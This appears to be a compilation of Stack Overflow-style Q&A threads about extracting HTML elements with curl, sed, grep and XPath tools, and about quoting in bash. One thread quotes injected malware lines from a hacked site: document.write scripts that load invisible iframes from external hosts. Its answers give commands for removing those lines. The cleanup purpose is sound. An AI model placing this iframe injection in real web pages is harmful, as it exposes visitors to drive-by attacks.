How to specify and extract an HTML element with curl - linux

When I curl some pages:
curl http://test.com
I get a result like the following:
<html>
<body>
<div>
<dl>
<dd> 10 times </dd>
</dl>
</div>
</body>
</html>
My desired result is simply 10 times.
Is there a good way to achieve this? If anyone has a suggestion, please let me know.
Thanks

If you are unable to use an HTML parser for whatever reason, then for your given simple HTML example you could use:
curl http://test.com | sed -rn 's#(^.*<dd>)(.*)(</dd>)#\2#p'
Pipe the output of the curl command into sed and enable extended regular expressions with -r or -E. Split the line into three sections, substitute the line with the second section only, and print the result.
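If an HTML parser turns out to be available after all, the same extraction is more robust with an XPath query. A minimal sketch, assuming xmllint (shipped with libxml2) is installed:
curl -s http://test.com | xmllint --html --xpath 'string(//dd)' -
string(//dd) returns the text content of the first dd element, here " 10 times ".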

Related

extract a specific word between two values

I curl an HTML page and store the output in a variable, then try to extract a word between two values, but I failed.
</tr> <tr> <td><a AAA</td>
<td>Thu Aug 30 09:59:36 UTC 2018</td> <td align="right"> 2247366 </td>
<td></td> </tr> <tr> <td>1.1.22</td> <td>Thu Aug 30 09:59:36
UTC 2018</td> <td align="right"> 5 </td> <td></td> </tr> </table>
</body> </html>
content=$(curl -s https://test/one/)
echo $content | sed -E 's_.*one/([^"]+).*_\1_'
I am trying to capture the value after one/ and before ", so I want to extract AAA, 1.1.22, ...
$ ... | sed -E 's_.*one/([^"]+).*_\1_'
AAA
BBB
Since you have slashes in your content, it is better to choose a different delimiter; here I used _.
UPDATE
Since you changed the input file format dramatically, here is the updated script:
$ echo "$contents" | sed -nE '/one/s_.*one/([^"]+).*_\1_p'
AAA
1.1.22
Don't parse XML/HTML with regex; use a proper XML/HTML parser and a powerful XPath query.
theory:
According to compiler theory, XML/HTML can't be parsed with regular expressions, which are based on finite state machines. Due to the hierarchical construction of XML/HTML, you need a pushdown automaton and an LALR grammar, manipulated with a tool like yacc.
realLife©®™ everyday tools in a shell:
You can use one of the following:
xmllint: often installed by default with libxml2; XPath 1 (check my wrapper to get newline-delimited output)
xmlstarlet: can edit, select, transform...; not installed by default; XPath 1
xpath: installed via Perl's XML::XPath module; XPath 1
xidel: XPath 3
saxon-lint: my own project, a wrapper over Michael Kay's Saxon-HE Java library; XPath 3
or you can use high-level languages and proper libs; I think of:
python's lxml (from lxml import etree)
perl's XML::LibXML, XML::XPath, XML::Twig::XPath, HTML::TreeBuilder::XPath
ruby's nokogiri, check this example
php's DOMXpath, check this example
Check: Using regular expressions with HTML tags
Example using XPath:
//a[contains(@href, "https://test/sites/two/one")]
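As a concrete sketch, assuming xidel is installed (the URL and the one/ href pattern come from the question above):
xidel -s https://test/one/ -e '//a[contains(@href, "one/")]/@href'
The -e option evaluates the XPath expression and prints one match per line.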

Bash script Linux: printing HTML closing tags

I have a bash script that includes 2 variables, and I'd like to print them in HTML, but only the opening tag works, not the ending or closing tag:
echo <h2>${ADMIN_STATUS}</h2>
The value of "ADMIN_STATUS" is shown in the H2, but bash doesn't close the tag, and "</h2>" shows up as text.
I mean bash doesn't close the <h2>; the </h2> isn't working.
Any ideas?
Thank you
The < and > are being treated as redirection operators. You need to quote them, which is most easily done by quoting the entire string:
echo "<h2>${ADMIN_STATUS}</h2>"

Cleaning up iframe malware

I'm helping someone clean up a malware infection on a site and I'm having a difficult time correctly matching some strings in sed so I can create a script to mass search and replace / remove it.
The strings are:
<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>
<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://vidintex.com/includes/class.pop.php"></iframe></div>');</script>
<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>
I can't seem to figure out how to escape the various characters in those lines...
If I try to just say delete the entire line if it matches http://vidintex.com/includes/class.pop.php it also deletes the closing html </body> in the .html files as well.
So I need to be able to match this entire line in sed:
<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>
Any help would be greatly appreciated!
You can try this:
sed -i '/vidintex\.com\/includes\/class\.pop\.php/d' files*
This will delete all lines containing vidintex.com/includes/class.pop.php.
You may start using SMScanner at SourceForge! It will solve your problems instantly.
Similar to Looking for script to delete iframe malware from linux server, you can look for the script tag that is placed next to the final body tag and replace that with just the body tag. This script will find all the affected files and remove the final script.
It might also match genuine files with scripts at the end, so first check that the grep only finds infected files.
# grep recursively for text
# escape all spaces in file names
# global search and replace with just body tag
grep -Rl "</script></body>" * | sed 's/ /\\ /g' | xargs sed -i 's/<script>.*<\/script><\/body>/<\/body>/g'
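If GNU grep, xargs, and sed are available, a variant that is safe for any filename (a sketch under that assumption) avoids the space-escaping step by NUL-separating the names:
# -Z ends each file name with a NUL byte; xargs -0 consumes them safely
grep -RlZ '</script></body>' . | xargs -0 sed -i 's|<script>.*</script></body>|</body>|g'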

Trying to 'grep' links from downloaded html pages in bash shell environment without cut, sed, tr commands (only e/grep)

In Linux shell, I am trying to return links to JPG files from the downloaded HTML script file. So far I only got to this point:
grep 'http://[:print:]*.jpg' 'www_page.html'
I don't want to use auxiliary commands like 'tr', 'cut', 'sed', etc.; 'lynx' is okay!
Using grep alone without massaging the file is doable but not recommended as many have pointed out in the comments.
If you can loosen up your requirements a bit, you can use HTML Tidy to massage the downloaded HTML file so that each HTML element is on its own line, letting the regular expression stay as simple as you wanted, something like this:
$ tidy file.html | grep -o 'http://[[:print:]]*\.jpg'
Note the use of the -o option to grep, which prints only the matching part of the input.
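Since the question allows lynx, another option (a sketch, assuming lynx is installed and the page was saved as www_page.html) is to let lynx extract the links and grep only the JPGs:
lynx -dump -listonly www_page.html | grep -o 'http://[[:print:]]*\.jpg'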

Curl Complex With Bash

Small note: I removed the http:// from in front of each link, because Stack Overflow wasn't allowing me to post it in its original form.
I wrote a script which accesses a webpage to catch a URL and download it. One of the URLs makes curl stop working, and causes the rest of the URLs in the list to do the same.
The script works as follows:
PAGE=$(curl -sL pageurl)
FILE_URL=$(echo $PAGE | sed -e 's/^.*<a href=\"\(.*\)\">\(.*\) alt="File" \/><\/a>.*$/\1/')
The FILE_URL value is:
URL/files/PartOne - Booke (Coll).pdf
webprod25.megashares.com/index.php?d01=3109985&lccdl=9e8e091ef33dd103&d01go=1&fln=/adobe reader exe.rar
and so on for the others.
When curl tries to fetch this URL, it shows the following error (output from bash debug mode):
++ curl -sOL 'webprod37.megashares.com/index.php?d01=3109985&lccdl=9e8e091ef33dd103&d01go=1&fln=/adobe' reader exe.rar fileshare273.depositfiles.com/auth-13023763920cd7ec18a0fdbfa8b62d35-188.165.197.50-43792102-7713641/FS273-7/PageMaker.rar -sOLJg fileshare601.depositfiles.com/auth-1302376689013d421df6c01e7f64c8d2-188.165.197.50-43801594-82379659/FS601-2/Adobe_Flash_Player_v10.3.180.65.2.rar -sOLJg 'webprod37.megashares.com/index.php?d01=de48789&lccdl=9e8e091ef33dd103&d01go=1&fln=/KAZAMIZA.COM.Adobe.Flash' Player-10.3.180.65.Beta-2.JUDGMENT DAY.rar bellatrix.oron.com/spzsttzwytpflwd76j3ne2moukomuhcdxg6llddfztqa2ztd7cplwwp457h3mxuacq3pbxzs/An-Beat - Mentally Insine '(Original' 'Mix).mp3'
curl: option -: is unknown
curl: try 'curl --help' or 'curl --manual' for more information
The quote marks were put in by curl itself; I tried some workarounds like escaping the URL, but it didn't work.
The basic problem seems to be that you are using $() expansion for something that looks to me like a multi-line value. You should try iterating over each line.
The other problem looks like one of improper quoting of URLs containing spaces. There's a lone dash (-) in "An-Beat - Mentally Insine"
Oh, one more problem: the sed part that catches the href="..." contents only works if there's exactly one href on the line. If there are two or more, your \(.*\) will match everything up to the last href. You should use something like href="\([^"]*\)", matching "any number of non-doublequotes followed by a doublequote".
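Putting those two fixes together, a minimal sketch (pageurl comes from the question; the grep/sed pipeline assumes one URL per href attribute):
# extract every href value, one per line, then download each URL individually
curl -sL "$pageurl" \
  | grep -o 'href="[^"]*"' \
  | sed 's/^href="//; s/"$//' \
  | while IFS= read -r url; do
      curl -sOL "$url"
    done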
Quote your variables as in:
pageurl='the url'
PAGE=$(curl -sL "$pageurl")
FILE_URL=$(echo "$PAGE" | sed -e 's/^.*<a href=\"\(.*\)\">\(.*\) alt="File" \/><\/a>.*$/\1/')
Otherwise, shell expansion will occur. The error "option -: is unknown" comes from the final part:
An-Beat - Mentally Insine
Because you didn't apply quotes to it, it got parsed as arguments, which you can clearly see in the syntax-highlighted code.
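A quick demonstration of the word splitting being described (the filename comes from the question):
f='An-Beat - Mentally Insine'
printf '[%s]\n' $f      # unquoted: splits into four arguments, including a lone -
printf '[%s]\n' "$f"    # quoted: passed as one intact argument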
